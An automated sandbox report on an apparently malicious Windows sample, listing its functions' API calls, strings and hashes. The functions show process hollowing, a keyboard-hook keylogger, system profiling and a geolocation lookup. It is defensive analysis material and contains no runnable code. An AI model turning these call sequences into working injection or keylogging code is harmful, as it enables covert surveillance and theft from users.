                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 12348136
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 12348139
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 1234814A
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 1234814D
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 1234815E
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 12348161
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 12348172
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 12348175
                                                                                                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 12348217
                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 1234822F
                                                                                                                                                                                          • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 12348245
                                                                                                                                                                                          • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 1234826B
                                                                                                                                                                                          • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 12348293
                                                                                                                                                                                          • NtUnmapViewOfSection.NTDLL(?,?), ref: 123482BB
                                                                                                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 123482DB
                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 123482ED
                                                                                                                                                                                          • NtClose.NTDLL(?), ref: 123482F7
                                                                                                                                                                                          • TerminateProcess.KERNEL32(?,00000000), ref: 12348301
                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 12348341
                                                                                                                                                                                          • NtMapViewOfSection.NTDLL(?,00000000), ref: 1234834C
                                                                                                                                                                                          • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 1234840B
                                                                                                                                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 12348428
                                                                                                                                                                                          • ResumeThread.KERNEL32(?), ref: 12348435
                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 1234844C
                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?), ref: 12348457
                                                                                                                                                                                          • NtUnmapViewOfSection.NTDLL(00000000), ref: 1234845E
                                                                                                                                                                                          • NtClose.NTDLL(?), ref: 12348468
                                                                                                                                                                                          • TerminateProcess.KERNEL32(?,00000000), ref: 12348472
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 1234847A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Process$Section$AddressHandleModuleProcView$ThreadVirtual$CloseContextCreateCurrentFreeMemoryTerminateUnmapWow64$AllocErrorLastReadResumeWrite
                                                                                                                                                                                          • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                                                                                                                                          • API String ID: 3150337530-3035715614
                                                                                                                                                                                          • Opcode ID: 70c691841189a6a8711d2b041b03e6602f3ac1123b14f4695d51fe82881c409f
                                                                                                                                                                                          • Instruction ID: f70df4c0ddae1e46c75ab55c3f3d572c43315ec123e4e05a6a9bcd125f116e4f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 70c691841189a6a8711d2b041b03e6602f3ac1123b14f4695d51fe82881c409f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3BA191B1644355AFDB108F64CC84BAB7BECFF88708F504A2AF659D6251DB70E804CB66
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1233A2B8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63windowCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 1233A2D3
                                                                                                                                                                                          • SetWindowsHookExA.USER32(0000000D,1233A2A4,00000000), ref: 1233A2E1
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 1233A2ED
                                                                                                                                                                                            • Part of subcall function 1234B4EF: GetLocalTime.KERNEL32(00000000), ref: 1234B509
                                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 1233A33B
                                                                                                                                                                                          • TranslateMessage.USER32(?), ref: 1233A34A
                                                                                                                                                                                          • DispatchMessageA.USER32(?), ref: 1233A355
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • Keylogger initialization failure: error , xrefs: 1233A301
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Message$CallbackDispatchDispatcherErrorHandleHookLastLocalModuleTimeTranslateUserWindows
                                                                                                                                                                                          • String ID: Keylogger initialization failure: error
                                                                                                                                                                                          • API String ID: 941179788-952744263
                                                                                                                                                                                          • Opcode ID: 42673667ab289fe8aa34a6067c4671e754e0c1b8a6d355f5e7485b631b17e109
                                                                                                                                                                                          • Instruction ID: 62324c7a248caf9075aa8c7b37455a4e255da717ca52e4ac910d228308b2c082
                                                                                                                                                                                          • Opcode Fuzzy Hash: 42673667ab289fe8aa34a6067c4671e754e0c1b8a6d355f5e7485b631b17e109
                                                                                                                                                                                          • Instruction Fuzzy Hash: AA11E373A50245ABD7126B75CC489AB77ECEBD5322B104B2DF88AC2280FA30D601C762
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1233A3E0 Relevance: 12.1, APIs: 8, Instructions: 112keyboardthreadCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetForegroundWindow.USER32(?,?,123A50F0), ref: 1233A416
                                                                                                                                                                                          • GetWindowThreadProcessId.USER32(00000000,?), ref: 1233A422
                                                                                                                                                                                          • GetKeyboardLayout.USER32(00000000), ref: 1233A429
                                                                                                                                                                                          • GetKeyState.USER32(00000010), ref: 1233A433
                                                                                                                                                                                          • GetKeyboardState.USER32(?,?,123A50F0), ref: 1233A43E
                                                                                                                                                                                          • ToUnicodeEx.USER32(123A5144,0000005B,?,?,00000010,00000000,00000000), ref: 1233A461
                                                                                                                                                                                          • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 1233A4C1
                                                                                                                                                                                          • ToUnicodeEx.USER32(123A5144,?,?,?,00000010,00000000,00000000), ref: 1233A4FA
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1888522110-0
                                                                                                                                                                                          • Opcode ID: e39b44ca35054e5905fddd8133582bae432bdc59d814fe86838e2ec28f0f463e
                                                                                                                                                                                          • Instruction ID: f620f10849ecb6435459c2079fa96b82b69b943257eb30a6b0c20f3f2f4bbf13
                                                                                                                                                                                          • Opcode Fuzzy Hash: e39b44ca35054e5905fddd8133582bae432bdc59d814fe86838e2ec28f0f463e
                                                                                                                                                                                          • Instruction Fuzzy Hash: B3315E72544318BFD711DA90CC84F9BBBECEB88754F00092AF645D7190E6B1E649DB92
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 146410F1 Relevance: 12.1, APIs: 8, Instructions: 88stringfileCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 1574 146410f1-14641166 call 14642c40 * 2 lstrlenW call 14642c40 lstrcatW lstrlenW 1581 14641177-1464119e lstrlenW FindFirstFileW 1574->1581 1582 14641168-14641172 lstrlenW 1574->1582 1583 146411a0-146411a8 1581->1583 1584 146411e1-146411e9 1581->1584 1582->1581 1585 146411c7-146411d8 FindNextFileW 1583->1585 1586 146411aa-146411c4 call 14641000 1583->1586 1585->1583 1587 146411da-146411db FindClose 1585->1587 1586->1585 1587->1584
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 14641137
                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?), ref: 14641151
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1464115C
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1464116D
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1464117C
                                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 14641193
                                                                                                                                                                                          • FindNextFileW.KERNELBASE(00000000,00000010), ref: 146411D0
                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 146411DB
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3665605507.0000000014641000.00000040.00001000.00020000.00000000.sdmp, Offset: 14640000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3665584194.0000000014640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3665605507.0000000014656000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_14640000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1083526818-0
                                                                                                                                                                                          • Opcode ID: 0f3915156e5c8da750f0eaf9ca25acb0406a55f12c5bd48b326bc925b09973f3
                                                                                                                                                                                          • Instruction ID: d3ced3889d8f80a0f9a3a965f7a69438c01abbd9726e60c4c6b87bee7a8295bc
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0f3915156e5c8da750f0eaf9ca25acb0406a55f12c5bd48b326bc925b09973f3
                                                                                                                                                                                          • Instruction Fuzzy Hash: B421E371A04318ABDB21EF64AC4CFCB7B9CEF84758F18092AF958D3091EB30D2058796
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1234B380 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 1234B3A7
                                                                                                                                                                                          • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 1234B3BD
                                                                                                                                                                                          • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 1234B3D6
                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 1234B41C
                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 1234B41F
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • http://geoplugin.net/json.gp, xrefs: 1234B3B7
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Internet$CloseHandleOpen$FileRead
                                                                                                                                                                                          • String ID: http://geoplugin.net/json.gp
                                                                                                                                                                                          • API String ID: 3121278467-91888290
                                                                                                                                                                                          • Opcode ID: 8c05bd6b167cd80b4ebe6e3e6228a6f3f144c8843285de6183d63f9772c423d8
                                                                                                                                                                                          • Instruction ID: b44bd17cb11bafc46bea005ffd889cdf6e33e6bdf8b85d93f32575da06804dea
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8c05bd6b167cd80b4ebe6e3e6228a6f3f144c8843285de6183d63f9772c423d8
                                                                                                                                                                                          • Instruction Fuzzy Hash: FE1198766063616BD228DE258C88DBB7FEDEFC5661F50092DF80597240DB64E908C7B1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 12341CFE Relevance: 9.2, APIs: 6, Instructions: 206memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 1234179C: SetLastError.KERNEL32(0000000D,12341D1C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,12341CFA), ref: 123417A2
                                                                                                                                                                                          • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,12341CFA), ref: 12341D37
                                                                                                                                                                                          • GetNativeSystemInfo.KERNEL32(?,1233D2A2,00000000,?,?,?,?,?,?,?,?,?,?,?,?,12341CFA), ref: 12341DA5
                                                                                                                                                                                          • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 12341DC9
                                                                                                                                                                                            • Part of subcall function 12341CA3: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,12341DE7,?,00000000,00003000,00000040,00000000,?,?), ref: 12341CB3
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 12341E10
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 12341E17
                                                                                                                                                                                          • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 12341F2A
                                                                                                                                                                                            • Part of subcall function 12342077: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,12341F37,?,?,?,?,?), ref: 123420E7
                                                                                                                                                                                            • Part of subcall function 12342077: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 123420EE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3950776272-0
                                                                                                                                                                                          • Opcode ID: 17f0e4f1c5c5c3fa42b1069a8ae9a11d7757fc58f86660e3743e21b635c0a396
                                                                                                                                                                                          • Instruction ID: 106777d9e337e1c865ded9e1d6eb295415e0017d579186a50d979255288ea5de
                                                                                                                                                                                          • Opcode Fuzzy Hash: 17f0e4f1c5c5c3fa42b1069a8ae9a11d7757fc58f86660e3743e21b635c0a396
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9061F6B6700A959BC7509F25CD80B7A7BE9BF84740F604399E9898B241DFB4E841CBD1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1233F7A7 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88sleepCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 12343549: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 12343569
                                                                                                                                                                                            • Part of subcall function 12343549: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,123A52F0), ref: 12343587
                                                                                                                                                                                            • Part of subcall function 12343549: RegCloseKey.KERNEL32(?), ref: 12343592
                                                                                                                                                                                          • Sleep.KERNEL32(00000BB8), ref: 1233F85B
                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 1233F8CA
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                                                                                                                          • String ID: 4.9.4 Pro$override$pth_unenc
                                                                                                                                                                                          • API String ID: 2281282204-930821335
                                                                                                                                                                                          • Opcode ID: 662fb9d4a4a93c331a5637c007a0784a2ce548d1b1fe295fcfbb1eca9f816946
                                                                                                                                                                                          • Instruction ID: 61101cb2eb241014a1956f981e69624d1ad096479c9a39bd779258e0678048ee
                                                                                                                                                                                          • Opcode Fuzzy Hash: 662fb9d4a4a93c331a5637c007a0784a2ce548d1b1fe295fcfbb1eca9f816946
                                                                                                                                                                                          • Instruction Fuzzy Hash: BD214D7BF5034057D9AE77754C55ABE3AA95BC2711FA00218F0468B2C5EE24AF0583E3
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0059113F Relevance: 4.9, APIs: 3, Instructions: 363memorylibraryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • VirtualAlloc.KERNEL32(?,?,00003000,00000040,?,?,?,?,00000000,?,?,?,00000000), ref: 005912C5
                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040,?,?,00000000,?,?,?,00000000,?,?,?,00007463), ref: 005912D5
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(?,?,?,00000000,?,?,?,00000000,?,?,?,00007463,?,?,?,00000000), ref: 0059141C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AllocVirtual$LibraryLoad
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2441068224-0
                                                                                                                                                                                          • Opcode ID: fa4691a24655f1888525f96d2d85cbe1021a4a7afa0b3384a6494944f45a67a8
                                                                                                                                                                                          • Instruction ID: 6cc02f01f01422443cc0a465ff73a5553caaa436fc15274bb6ef38e1e28243a1
                                                                                                                                                                                          • Opcode Fuzzy Hash: fa4691a24655f1888525f96d2d85cbe1021a4a7afa0b3384a6494944f45a67a8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 59D18E31A00626AFDF24CF69CC84BAABBB5FF84710F258559E809AB655D730ED01CF94
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1234B60D Relevance: 3.0, APIs: 2, Instructions: 41COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetComputerNameExW.KERNEL32(00000001,?,0000002B,123A50E4), ref: 1234B62A
                                                                                                                                                                                          • GetUserNameW.ADVAPI32(?,1233F223), ref: 1234B642
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Name$ComputerUser
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4229901323-0
                                                                                                                                                                                          • Opcode ID: 86509eb738ce0a1eb1136abff9244ab49420250181bb12c80c33164986ea8d78
                                                                                                                                                                                          • Instruction ID: 6173ee16fde0b6994bcfe581485862e024c8c4b1923c2b2a6a10c4aedaed7b54
                                                                                                                                                                                          • Opcode Fuzzy Hash: 86509eb738ce0a1eb1136abff9244ab49420250181bb12c80c33164986ea8d78
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5F01FB7690021CABDB55DBD4DC44AEEB7BCEF48306F100266E506F6250EE746B89CBA4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1233F8D1 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,123454FC,123A4EE0,123A5A00,123A4EE0,00000000,123A4EE0,00000000,123A4EE0,4.9.4 Pro), ref: 1233F8E5
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InfoLocale
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2299586839-0
                                                                                                                                                                                          • Opcode ID: 07ccde7cb2427e67345b7c23eff0edbfd1de86d574345f50f4f93769b8bda7e1
                                                                                                                                                                                          • Instruction ID: 9f861203b342084a1ccb27f15bbce9e5630072aae20a14a9829f7a10d9fd651c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 07ccde7cb2427e67345b7c23eff0edbfd1de86d574345f50f4f93769b8bda7e1
                                                                                                                                                                                          • Instruction Fuzzy Hash: F9D05B7174411C77D61096958C0AEAA779CD701752F000195FA09D72C0D9E16E0487D1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1234CB50 Relevance: 148.9, APIs: 52, Strings: 33, Instructions: 176libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,1233E9E1), ref: 1234CB65
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 1234CB6E
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,1233E9E1), ref: 1234CB85
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 1234CB88
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,1233E9E1), ref: 1234CB9A
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 1234CB9D
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,1233E9E1), ref: 1234CBAE
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 1234CBB1
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,1233E9E1), ref: 1234CBC3
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 1234CBC6
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,1233E9E1), ref: 1234CBD2
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 1234CBD5
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,1233E9E1), ref: 1234CBE6
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 1234CBE9
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,1233E9E1), ref: 1234CBFA
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 1234CBFD
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,1233E9E1), ref: 1234CC0E
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 1234CC11
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,1233E9E1), ref: 1234CC22
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 1234CC25
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,1233E9E1), ref: 1234CC36
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 1234CC39
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,1233E9E1), ref: 1234CC4A
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 1234CC4D
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,1233E9E1), ref: 1234CC5E
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 1234CC61
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,1233E9E1), ref: 1234CC72
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 1234CC75
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,1233E9E1), ref: 1234CC83
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 1234CC86
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,1233E9E1), ref: 1234CC97
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 1234CC9A
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,1233E9E1), ref: 1234CCA7
